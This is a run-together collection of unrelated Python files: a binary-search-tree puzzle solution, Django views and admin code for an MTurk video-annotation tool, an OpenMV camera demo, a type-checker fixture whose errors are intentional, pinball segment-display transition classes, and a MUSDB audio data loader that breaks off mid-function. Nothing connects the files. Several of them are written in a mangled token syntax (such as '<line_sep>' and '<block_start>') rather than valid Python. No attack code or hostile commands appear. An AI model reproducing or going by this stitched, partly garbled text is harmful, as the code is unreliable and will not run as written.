""" Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.   Example 1: Input: root = [5,3,6,2,4,null,8,1,null,null,null,7,9] Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9] Example 2: Input: root = [5,1,7] Output: [1,null,5,null,7]   Constraints: The number of nodes in the given tree will be in the range [1, 100]. 0 <= Node.val <= 1000 """<line_sep># Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right <class_stmt>Solution<block_start><def_stmt>increasingBST self root:TreeNode<arrow>TreeNode<block_start><def_stmt>inorder root arr<block_start><if_stmt>root<is><none><block_start><return><block_end>inorder(root.left arr)<line_sep>arr.append(root.val)<line_sep>inorder(root.right arr)<block_end>arr=[]<line_sep>inorder(root arr)<line_sep>ps=[]<for_stmt>i,val enumerate(arr)<block_start>c=TreeNode(val)<if_stmt>i<g>0<block_start>ps[-1].right=c<block_end>ps.append(c)<block_end><return>ps[0]<block_end><block_end>
"""Views for browsing, annotating, verifying, and paying out video tasks.

Improvements over the original: duplicate import lines collapsed (no imported
name removed), leftover debug ``print`` replaced with lazy logger output,
``== None``/``!= None`` replaced with identity checks, builtin ``id`` no longer
shadowed, and append-loops rewritten as comprehensions. All module-level
names and signatures are unchanged.
"""
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponseBadRequest, HttpResponseForbidden
from django.views.generic import View
from django.views.decorators.clickjacking import xframe_options_exempt
from django.contrib.admin.views.decorators import staff_member_required
from django.core.exceptions import ObjectDoesNotExist

from mturk.queries import get_active_video_turk_task
from mturk.models import Task, FullVideoTask, SingleFrameTask
import mturk.utils

from .models import *
from .services import *

from datetime import datetime, timezone
import os
import json
import urllib.request
import urllib.parse
import markdown
import sys
import logging
import ast

logger = logging.getLogger()


def home(request):
    """List all unverified videos as the landing page."""
    need_annotating = Video.objects.filter(id__gt=0, verified=False)
    return render(request, 'video_list.html',
                  context={'videos': need_annotating, 'thumbnail': True,
                           'test': settings.AWS_ID, 'title': 'Videos'})


def verify_list(request):
    """List annotated-but-unverified videos (capped at 250)."""
    need_verification = Video.objects.filter(
        id__gt=0, verified=False).exclude(annotation='')[:250]
    return render(request, 'video_list.html',
                  context={'videos': need_verification,
                           'title': 'Videos to Verify'})


def verified_list(request):
    """List annotated and verified videos (capped at 100)."""
    verified = Video.objects.filter(
        id__gt=0, verified=True).exclude(annotation='')[:100]
    return render(request, 'video_list.html',
                  context={'videos': verified, 'title': 'Verified Videos'})


def ready_to_pay(request):
    """Show all full-video tasks so completed ones can be paid."""
    # Original filter kept for reference:
    # FullVideoTask.objects.filter(paid=False, video__verified=True).exclude(hit_id='')
    tasks = FullVideoTask.objects.all()
    # Was a bare print(); use the module logger with lazy %-formatting instead.
    logger.debug("there are %d tasks", len(tasks))
    return render(request, 'turk_ready_to_pay.html', context={'tasks': tasks})


def next_unannotated(request, video_id):
    """Redirect to the first unannotated video with an id above video_id."""
    # Renamed from `id` to avoid shadowing the builtin.
    next_id = Video.objects.filter(id__gt=video_id, annotation='')[0].id
    return redirect('video', next_id)


# Status of Not Published, Published, Awaiting Approval, Verified.
# This is a bit convoluted as there's status stored on
# video (approved) as well as FullVideoTask (closed, paid, etc.).
def get_mturk_status(video, full_video_task):
    """Derive a human-readable MTurk status string for a video/task pair."""
    if video.verified:
        return "Verified"
    if full_video_task is None:
        if video.rejected:
            return "Rejected"
        elif video.annotation == '':
            return "Not Published"
        else:
            return "Awaiting Approval"
    # A task exists: empty worker_id means nobody has taken the HIT yet.
    if full_video_task.worker_id == '':
        return "Published"
    return "Awaiting Approval"


@xframe_options_exempt
def video(request, video_id):
    """Render the annotation UI for one video, including MTurk task state."""
    try:
        video = Video.objects.get(id=video_id)
        labels = Label.objects.all()
    except Video.DoesNotExist:
        raise Http404('No video with id "{}". Possible fixes: \n1) Download an up to date DB, see README. \n2) Add this video to the DB via /admin'.format(video_id))
    mturk_data = mturk.utils.authenticate_hit(request)
    if 'error' in mturk_data:
        return HttpResponseForbidden(mturk_data['error'])
    if not (mturk_data['authenticated'] or request.user.is_authenticated()):
        # NOTE(review): is_authenticated is a property (not callable) on
        # modern Django; the call form is kept for the version in use here.
        return redirect('/login/?next=' + request.path)

    # Optional clip boundaries passed as query parameters.
    start_time = float(request.GET['s']) if 's' in request.GET else None
    end_time = float(request.GET['e']) if 'e' in request.GET else None

    turk_task = get_active_video_turk_task(video.id)
    if turk_task is not None:
        metrics_dict = ast.literal_eval(turk_task.metrics) if turk_task.metrics != '' else {}
        # Data for Javascript.
        full_video_task_data = {
            'id': turk_task.id,
            'storedMetrics': metrics_dict,
            'bonus': float(turk_task.bonus),
            'bonusMessage': turk_task.message,
            'rejectionMessage': settings.MTURK_REJECTION_MESSAGE,
            'emailSubject': settings.MTURK_EMAIL_SUBJECT,
            'emailMessage': settings.MTURK_EMAIL_MESSAGE,
            'isComplete': turk_task.worker_id != ''
        }
        # Data for python templating.
        if turk_task.last_email_sent_date is not None:
            mturk_data['last_email_sent_date'] = turk_task.last_email_sent_date.strftime("%Y-%m-%d %H:%M")
    else:
        full_video_task_data = None

    mturk_data['status'] = get_mturk_status(video, turk_task)
    mturk_data['has_current_full_video_task'] = full_video_task_data is not None

    video_data = json.dumps({
        'id': video.id,
        'location': video.url,
        'path': video.host,
        'is_image_sequence': bool(video.image_list),
        'annotated': video.annotation != '',
        'verified': video.verified,
        'rejected': video.rejected,
        'start_time': start_time,
        'end_time': end_time,
        'turk_task': full_video_task_data
    })

    # Prefer the video's own label set; fall back to all labels.
    video_labels = video.labels.all()
    if video_labels:
        label_data = [{'name': v_label.name, 'color': v_label.color}
                      for v_label in video_labels]
    else:
        label_data = [{'name': l.name, 'color': l.color} for l in labels]

    help_content = ''
    if settings.HELP_URL and settings.HELP_USE_MARKDOWN:
        help_content = urllib.request.urlopen(settings.HELP_URL).read().decode('utf-8')
        help_content = markdown.markdown(help_content)

    response = render(request, 'video.html', context={
        'label_data': label_data,
        'video_data': video_data,
        'image_list': list(map(urllib.parse.quote, json.loads(video.image_list))) if video.image_list else 0,
        'image_list_path': urllib.parse.quote(video.host, safe='/:'),
        'help_url': settings.HELP_URL,
        'help_embed': settings.HELP_EMBED,
        'mturk_data': mturk_data,
        'iframe_mode': mturk_data['authenticated'],
        'survey': False,
        'help_content': help_content})
    if not mturk_data['authenticated']:
        response['X-Frame-Options'] = 'SAMEORIGIN'
    return response


def get_states(request, states=None):
    """Return the states belonging to the requested label as JSON."""
    label_name = request.GET.get('label_name')
    if label_name:
        label_name = label_name.replace("%20", " ")
    state_data = [{'name': s.name, 'color': s.color}
                  for s in State.objects.filter(label_name=label_name)]
    return HttpResponse(json.dumps(state_data))


class AnnotationView(View):
    """Read/write a video's annotation; completes the MTurk task on save."""

    def get(self, request, video_id):
        video = Video.objects.get(id=video_id)
        return HttpResponse(video.annotation, content_type='application/json')

    def post(self, request, video_id):
        data = json.loads(request.body.decode('utf-8'))
        video = Video.objects.get(id=video_id)
        video.annotation = json.dumps(data['annotation'])
        video.save()
        hit_id = data.get('hitId', None)
        if hit_id is not None:
            if not Task.valid_hit_id(hit_id):
                return HttpResponseForbidden('Not authenticated')
            try:
                worker_id = data.get('workerId', '')
                assignment_id = data.get('assignmentId', '')
                task = Task.get_by_hit_id(hit_id)
                task.complete(worker_id, assignment_id, data['metrics'])
            except ObjectDoesNotExist:
                # In DEBUG the task may legitimately be absent; otherwise fail.
                if not settings.DEBUG:
                    raise
        return HttpResponse('success')


class ReceiveCommand(View):
    """Dispatch accept/reject/email commands for a video's MTurk task."""

    def post(self, request, video_id):
        data = json.loads(request.body.decode('utf-8'))
        try:
            vid_id = int(video_id)
            command_type = data['type']
            message = data['message']
            if command_type == "accept":
                accept_video(request, vid_id, data['bonus'], message,
                             data['reopen'], data['delete_boxes'],
                             data['block_worker'], data['updated_annotations'])
            elif command_type == "reject":
                reject_video(request, vid_id, message, data['reopen'],
                             data['delete_boxes'], data['block_worker'],
                             data['updated_annotations'])
            elif command_type == "email":
                email_worker(request, vid_id, data['subject'], message)
            # Unknown command types fall through and still return 200,
            # matching the original behavior.
            return HttpResponse(status=200)
        except Exception as e:
            logger.exception(e)
            response = HttpResponse(status=500)
            response['error-message'] = str(e)
            return response
from django.contrib import admin

from basic.messages.models import Message


@admin.register(Message)
class MessageAdmin(admin.ModelAdmin):
    """Change-list configuration for user-to-user messages."""

    # Columns shown on the admin change list.
    list_display = ('from_user', 'to_user', 'subject', 'to_status',
                    'from_status', 'created', 'content_type', 'object_id')
# Line Drawing
#
# This example shows off drawing lines on the OpenMV Cam: ten random,
# brightly colored segments per frame, printing the achieved FPS.

import sensor, image, time, pyb

sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)  # or GRAYSCALE...
sensor.set_framesize(sensor.QVGA)       # or QQVGA...
sensor.skip_frames(time=2000)
clock = time.clock()


def random_endpoint(span):
    # Same arithmetic as the original: a value in [-(span // 2), 2 * span - span // 2).
    return (pyb.rng() % (2 * span)) - (span // 2)


while True:
    clock.tick()
    img = sensor.snapshot()
    for _ in range(10):
        # rng() call order preserved: x0, y0, x1, y1, then r, g, b.
        x0 = random_endpoint(img.width())
        y0 = random_endpoint(img.height())
        x1 = random_endpoint(img.width())
        y1 = random_endpoint(img.height())
        # Bright channels in [128, 254].
        r = (pyb.rng() % 127) + 128
        g = (pyb.rng() % 127) + 128
        b = (pyb.rng() % 127) + 128
        # If the first argument is a scalar then this method expects
        # to see x0, y0, x1, and y1. Otherwise, it expects a (x0,y0,x1,y1) tuple.
        img.draw_line(x0, y0, x1, y1, color=(r, g, b), thickness=2)
    print(clock.fps())
# NOTE: Negative-test fixture for a static type checker; every "should generate an error" below is intentional and the `# type:` comments are checker directives that must not be edited. # This sample tests annotated types on global variables. # This should generate an error because the declared # type below does not match the assigned type. glob_var1=4<line_sep># This should generate an error because the declared # type doesn't match the later declared type. glob_var1=Exception()# type: str glob_var1=Exception()# type: Exception # This should generate an error because the assigned # type doesn't match the declared type. glob_var1="hello"# type: Exception # This should generate an error. glob_var2=5<def_stmt>func1 <block_start><global>glob_var1<line_sep><global>glob_var2<line_sep># This should generate an error. glob_var1=3<line_sep>glob_var2="hello"<block_end># type: str
"""Text transitions used for segment displays."""<import_stmt>abc<import_from_stmt>typing Optional List<import_from_stmt>mpf.core.placeholder_manager TextTemplate<import_from_stmt>mpf.core.rgb_color RGBColor<import_from_stmt>mpf.devices.segment_display.segment_display_text SegmentDisplayText UncoloredSegmentDisplayText<line_sep>STEP_OUT_OF_RANGE_ERROR="Step is out of range"<line_sep>TRANSITION_DIRECTION_UNKNOWN_ERROR="Transition uses an unknown direction value"<class_stmt>TransitionBase(metaclass=abc.ABCMeta)<block_start>"""Base class for text transitions in segment displays."""<line_sep>__slots__=["output_length" "config" "collapse_dots" "collapse_commas"]<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Initialize the transition."""<line_sep>self.output_length=output_length<line_sep>self.config=config<line_sep>self.collapse_dots=collapse_dots<line_sep>self.collapse_commas=collapse_commas<for_stmt>key,value config.items()<block_start><if_stmt>hasattr(self key)<block_start>setattr(self key value)<block_end><block_end><block_end>@abc.abstractmethod<def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><raise>NotImplementedError<block_end># pylint: disable=too-many-arguments @abc.abstractmethod<def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<line_sep><raise>NotImplementedError<block_end><block_end><class_stmt>TransitionRunner<block_start>"""Class to run/execute transitions using an iterator."""<line_sep>__slots__=["_transition" "_step" "_current_placeholder" "_new_placeholder" "_current_colors" "_new_colors"]<line_sep># pylint: disable=too-many-arguments <def_stmt>__init__ self machine transition:TransitionBase current_text:str 
new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow><none><block_start>"""Class initializer."""<line_sep>self._transition=transition<line_sep>self._step=0<line_sep>self._current_placeholder=TextTemplate(machine current_text)<line_sep>self._new_placeholder=TextTemplate(machine new_text)<line_sep>self._current_colors=current_colors<line_sep>self._new_colors=new_colors<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator."""<line_sep><return>self<block_end><def_stmt>__next__ self<block_start>"""Evaluate and return the next transition step."""<if_stmt>self._step<ge>self._transition.get_step_count()<block_start><raise>StopIteration<block_end>transition_step=self._transition.get_transition_step(self._step self._current_placeholder.evaluate({}) self._new_placeholder.evaluate({}) self._current_colors self._new_colors)<line_sep>self._step<augadd>1<line_sep><return>transition_step<block_end><block_end><class_stmt>NoTransition(TransitionBase)<block_start>"""Segment display no transition effect."""<def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>1<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end><return>SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<block_end><block_end><class_stmt>PushTransition(TransitionBase)<block_start>"""Segment display push transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class 
initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots 
self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>temp_list=new_display_text<line_sep>temp_list.extend(transition_text)<line_sep>temp_list.extend(current_display_text)<line_sep><return>temp_list[self.output_length+len(self.text)-(step+1):2<times>self.output_length+len(self.text)-(step+1)]<block_end><if_stmt>self.direction<eq>'left'<block_start>temp_list=current_display_text<line_sep>temp_list.extend(transition_text)<line_sep>temp_list.extend(new_display_text)<line_sep><return>temp_list[step+1:step+1+self.output_length]<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>CoverTransition(TransitionBase)<block_start>"""Segment display cover transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas 
new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>new_extended_display_text=new_display_text<line_sep>new_extended_display_text.extend(transition_text)<if_stmt>step<l>self.output_length<block_start>temp_text=new_extended_display_text[-(step+1):]<line_sep>temp_text.extend(current_display_text[step+1:])<block_end><else_stmt><block_start>temp_text=new_display_text[-(step+1):-(step+1)+self.output_length]<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start>new_extended_display_text=transition_text<line_sep>new_extended_display_text.extend(new_display_text)<if_stmt>step<l>self.output_length<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(new_extended_display_text[:step+1])<block_end><else_stmt><block_start>temp_text=new_extended_display_text[step-self.output_length+1:step+1]<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>UncoverTransition(TransitionBase)<block_start>"""Segment display uncover transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps 
required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots 
self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>current_extended_display_text=transition_text<line_sep>current_extended_display_text.extend(current_display_text)<if_stmt>step<l>len(self.text)<block_start>temp_text=current_extended_display_text[len(self.text)-step-1:len(self.text)-step-1+self.output_length]<block_end><else_stmt><block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(current_extended_display_text[:self.output_length-len(temp_text)])<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start>current_extended_display_text=current_display_text<line_sep>current_extended_display_text.extend(transition_text)<if_stmt>step<l>len(self.text)<block_start>temp_text=current_extended_display_text[step+1:step+1+self.output_length]<block_end><else_stmt><block_start>temp_text=current_display_text[step+1:]<line_sep>temp_text.extend(new_display_text[-(self.output_length-len(temp_text)):])<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>WipeTransition(TransitionBase)<block_start>"""Segment display wipe transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> 
new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start><if_stmt>step<l>len(self.text)<block_start>temp_text=transition_text[-(step+1):]<line_sep>temp_text.extend(current_display_text[step+1:])<block_end><elif_stmt>step<l>self.output_length<block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(transition_text)<line_sep>temp_text.extend(current_display_text[len(temp_text):])<block_end><else_stmt><block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(transition_text[:self.output_length-len(temp_text)])<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start><if_stmt>step<l>len(self.text)<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(transition_text[:step+1])<block_end><elif_stmt>step<l>self.output_length<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(transition_text)<line_sep>temp_text.extend(new_display_text[len(temp_text):])<block_end><e
lif_stmt>step<l>self.output_length+len(self.text)-1<block_start>temp_text=transition_text[step-(self.output_length+len(self.text))+1:]<line_sep>temp_text.extend(new_display_text[-(self.output_length-len(temp_text)):])<block_end><else_stmt><block_start>temp_text=new_display_text<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>SplitTransition(TransitionBase)<block_start>"""Segment display split transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='out'<line_sep>self.mode='push'<line_sep>super().__init__(output_length collapse_dots collapse_commas config)<block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>int((self.output_length+1)/2)<block_end># pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas 
new_colors)<if_stmt>self.mode<eq>'push'<block_start><if_stmt>self.direction<eq>'out'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>characters=int(self.output_length/2)<line_sep>split_point=characters<if_stmt>characters<times>2<eq>self.output_length<block_start>characters<augsub>1<block_end><else_stmt><block_start>split_point<augadd>1<block_end>characters<augsub>step<line_sep>temp_text=current_display_text[split_point-characters:split_point]<line_sep>temp_text.extend(new_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(current_display_text[split_point:split_point+characters])<line_sep><return>temp_text<block_end><if_stmt>self.direction<eq>'in'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>split_point=int(self.output_length/2)<line_sep>characters=1<if_stmt>split_point<times>2<l>self.output_length<block_start>split_point<augadd>1<block_end>characters<augadd>step<line_sep>temp_text=new_display_text[split_point-characters:split_point]<line_sep>temp_text.extend(current_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(new_display_text[split_point:split_point+characters])<line_sep><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><if_stmt>self.mode<eq>'wipe'<block_start><if_stmt>self.direction<eq>'out'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>characters=int(self.output_length/2)<if_stmt>characters<times>2<eq>self.output_length<block_start>characters<augsub>1<block_end>characters<augsub>step<line_sep>temp_text=current_display_text[:characters]<line_sep>temp_text.extend(new_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(current_display_text[-characters:])<line_sep><return>temp_text<block_end><if_stmt>self.
direction<eq>'in'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>temp_text=new_display_text[:step+1]<line_sep>temp_text.extend(current_display_text[step+1:step+1+(self.output_length-2<times>len(temp_text))])<line_sep>temp_text.extend(new_display_text[-(step+1):])<line_sep><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><raise>AssertionError("Transition uses an unknown mode value")<block_end><block_end>
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
MUSDB18 data-iterator code for MSS.
'''

import random

import numpy as np

import musdb
from nnabla.utils.data_source import DataSource


class Compose():
    """Chain several augmentation callables into a single callable.

    Args:
        transforms: list of callables, each taking and returning an audio
            array of shape (channels, samples).
    """

    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, audio):
        # Apply each transform in order, feeding the output of one
        # into the next.
        for transform in self.transforms:
            audio = transform(audio)
        return audio


def _augment_gain(audio, low=0.75, high=1.25):
    """Applies a random gain between `low` and `high`"""
    return audio * random.uniform(low, high)


def _augment_channelswap(audio):
    """Swap channels of stereo signals with a probability of p=0.5"""
    # Only stereo input is eligible; the RNG is consulted lazily so the
    # random stream matches runs that mix mono and stereo tracks.
    if audio.shape[0] == 2 and random.random() < 0.5:
        return np.flip(audio, 0)
    return audio


def load_datasources(parser, args):
    """Build the training data source from command-line arguments.

    Registers the MUSDB-specific arguments on `parser`, re-parses, and
    constructs a :class:`MUSDBDataSource` with random track mixing enabled.

    Returns:
        (train_dataset, args) tuple.
    """
    parser.add_argument('--is-wav', action='store_true', default=True,
                        help='loads wav instead of STEMS')
    parser.add_argument('--samples-per-track', type=int, default=64)
    parser.add_argument('--source-augmentations', type=str, nargs='+',
                        default=['gain', 'channelswap'])
    args = parser.parse_args()

    # Resolve augmentation names ('gain', ...) to the module-level
    # `_augment_<name>` functions defined above.
    augmentations = Compose(
        [globals()['_augment_' + name] for name in args.source_augmentations])

    train_dataset = MUSDBDataSource(
        source_augmentations=augmentations, random_track_mix=True, args=args)
    return train_dataset, args


class MUSDBDataSource(DataSource):

    def __init__(
        self, args, download=False, samples_per_track=64,
        source_augmentations=lambda audio: audio,
        random_track_mix=False, dtype=np.float32, seed=42, rng=None
    ):
        """MUSDB18 nnabla.utils.data_source sampling tracks with replacement.

        Parameters
        ----------
        args :
            additional arguments used to add further control for
            the musdb dataset initialization function.
        download : boolean
            automatically download 7s preview version of MUS
        samples_per_track : int
            number of samples yielded from each track per epoch (default 64).
        source_augmentations : list[callables]
            augmentation functions applied to each (src, samples) audio
            excerpt; defaults to the identity.
        random_track_mix : boolean
            randomly mixes sources from different tracks to assemble a
            custom mix (train subset only).
        seed : int
            control randomness of dataset iterations
        dtype : numeric type
            data type of the output tuple x and y
        """
        super(MUSDBDataSource, self).__init__(shuffle=True)
        if rng is None:
            rng = np.random.RandomState(seed)
        self.rng = rng
        random.seed(seed)

        self.args = args
        # No root given -> fall back to musdb's auto-download location.
        self.download = args.root is None
        self.samples_per_track = samples_per_track
        self.source_augmentations = source_augmentations
        self.random_track_mix = random_track_mix
        self.mus = musdb.DB(
            root=args.root, is_wav=args.is_wav, split=None,
            subsets='train', download=download)
        print(f"Finished loading dataset with {len(self.mus.tracks)} tracks.")

        self.sample_rate = 44100  # musdb has fixed sample rate
        self.dtype = dtype
        self._size = len(self.mus.tracks) * self.samples_per_track
        self._variables = ('mixture', 'target')
        self.reset()

    def _get_data(self, position):
        """Return one (mixture, target) pair for the given index position."""
        index = self._indexes[position]

        # Map the flat sample index back to its parent track.
        track = self.mus.tracks[index // self.samples_per_track]

        if self.args.seq_dur:
            # Training: assemble a custom mix from random excerpts.
            target_index = None
